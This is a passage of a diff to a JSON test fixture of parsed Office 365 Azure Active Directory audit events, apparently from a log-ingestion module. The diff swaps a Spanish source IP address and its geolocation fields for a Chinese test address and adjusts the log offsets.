         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -3167,8 +3127,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:34:52.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -3183,7 +3143,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 102430,
+        "log.offset": 102390,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -3212,9 +3172,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:34:52",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -3299,20 +3259,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -3323,8 +3281,8 @@
     },
     {
         "@timestamp": "2020-02-09T18:25:54.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -3339,7 +3297,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 106341,
+        "log.offset": 106299,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -3368,9 +3326,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T18:25:54",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -3446,20 +3404,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -3470,8 +3426,8 @@
     },
     {
         "@timestamp": "2020-02-09T18:25:54.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -3486,7 +3442,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 111772,
+        "log.offset": 111728,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -3515,9 +3471,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T18:25:54",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -3593,20 +3549,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -3617,8 +3571,8 @@
     },
     {
         "@timestamp": "2020-02-09T18:25:54.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update application.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -3633,7 +3587,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 117203,
+        "log.offset": 117157,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -3662,9 +3616,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T18:25:54",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -3740,20 +3694,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -3764,8 +3716,8 @@
     },
     {
         "@timestamp": "2020-02-09T18:25:54.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -3780,7 +3732,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 122634,
+        "log.offset": 122586,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -3809,9 +3761,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T18:25:54",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -3896,20 +3848,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -3920,8 +3870,8 @@
     },
     {
         "@timestamp": "2020-02-09T18:26:05.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment to service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -3936,7 +3886,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 126545,
+        "log.offset": 126495,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -3965,9 +3915,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T18:26:05",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -4059,20 +4009,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -4083,8 +4031,8 @@
     },
     {
         "@timestamp": "2020-02-09T18:26:05.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment to service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -4099,7 +4047,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 131695,
+        "log.offset": 131643,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -4128,9 +4076,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T18:26:05",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -4222,20 +4170,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -4246,8 +4192,8 @@
     },
     {
         "@timestamp": "2020-02-09T18:26:05.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment to service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -4262,7 +4208,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 136845,
+        "log.offset": 136791,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -4291,9 +4237,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T18:26:05",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -4385,20 +4331,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -4409,8 +4353,8 @@
     },
     {
         "@timestamp": "2020-02-09T18:26:05.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment to service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -4425,7 +4369,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 141995,
+        "log.offset": 141939,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -4454,9 +4398,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T18:26:05",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -4548,20 +4492,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -4572,8 +4514,8 @@
     },
     {
         "@timestamp": "2020-02-09T18:26:05.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment to service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -4588,7 +4530,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 147145,
+        "log.offset": 147087,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -4617,9 +4559,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T18:26:05",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -4711,20 +4653,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -4735,8 +4675,8 @@
     },
     {
         "@timestamp": "2020-02-09T18:26:05.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment to service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -4751,7 +4691,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 152295,
+        "log.offset": 152235,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -4780,9 +4720,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T18:26:05",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -4874,20 +4814,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -4898,8 +4836,8 @@
     },
     {
         "@timestamp": "2020-02-09T18:26:05.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment to service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -4914,7 +4852,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 157445,
+        "log.offset": 157383,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -4943,9 +4881,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T18:26:05",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -5037,20 +4975,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
